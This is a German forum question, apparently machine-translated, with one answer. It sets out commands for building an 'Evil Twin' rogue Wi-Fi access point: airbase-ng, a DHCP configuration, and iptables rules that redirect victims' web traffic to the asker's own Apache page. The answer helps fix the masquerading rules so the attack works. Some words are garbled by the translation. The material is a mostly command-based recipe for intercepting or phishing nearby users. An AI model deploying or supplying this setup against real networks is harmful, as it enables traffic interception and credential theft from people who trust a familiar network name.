iptables-Problem in Evil Twin

iptables-Problem in Evil Twin

Ich habe mich mit der Evil Twin-Methode befasst und diese Schritte gefunden:

  1. Erstellen von AP

    airmon-ng start wlan0 
    airbase-ng -e PrivateWIFI -c 9 -v mon0
    
  2. at0Aufbau

    ifconfig at0 up
    ifconfig at0 192.168.1.20 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.20
    
  3. Ausführen von DHCP

    echo > '/var/lib/dhcp/dhcpd.leases'
    
    /etc/init.d/isc-dhcp-server start OR dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0 ( the both of them is working fine )
    

Datei dhcpd.conf:

ddns-update-style interim;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.1;
    option domain-name-servers 8.8.8.8;
    range 192.168.1.2 192.168.1.250;
}

und dann startete ich meinen Apache2-Server

(Bis hierher gibt es kein Problem)

Status (Ich kann meinen Webserver 192.168.1.20 von meinem Telefon aus öffnen und die Webseite sehen, die ich erstellt habe :) :))

Das Problem besteht jedoch darin, dass nichts passiert, wenn ich iptables-Befehle hinzufüge:

iptables --flush
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward

////////////////////////////////////////////////////////////////////////

iptables --flush
iptables --table nat --append POSTROUTING --out-interface at0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 192.168.1.20:80
iptables -t nat -A POSTROUTING -j MASQUERADE
echo "1" > /proc/sys/net/ipv4/ip_forward

Beide funktionieren nicht. Ich wünschte, jemand könnte mir helfen.

Antwort1

Ich weiß nicht, ob das Problem darin liegt, dass Ihr Browser zum Webserver umgeleitet wird oder ob die Verbindung zum Internet nicht hergestellt wird, aber ich sehe etwas, das Sie beheben sollten.

Sie sollten nureinsMasquerading-Schnittstelle, nicht zwei. Die richtige isteth0(vorausgesetzt, es handelt sich um die Schnittstelle, diedirektmit dem Internet verbunden), nicht dieSchurkennetz bei0Schnittstelle. Daher müssen Sie diese vorletzte Zeile entfernen.

Prüfen Sie anschließend, ob alles wie erwartet funktioniert. Wenn nicht, geben Sie uns eine genaue Beschreibung Ihres Problems und Ihre aktuelle Diagnose.

Mit freundlichen Grüße.

verwandte Informationen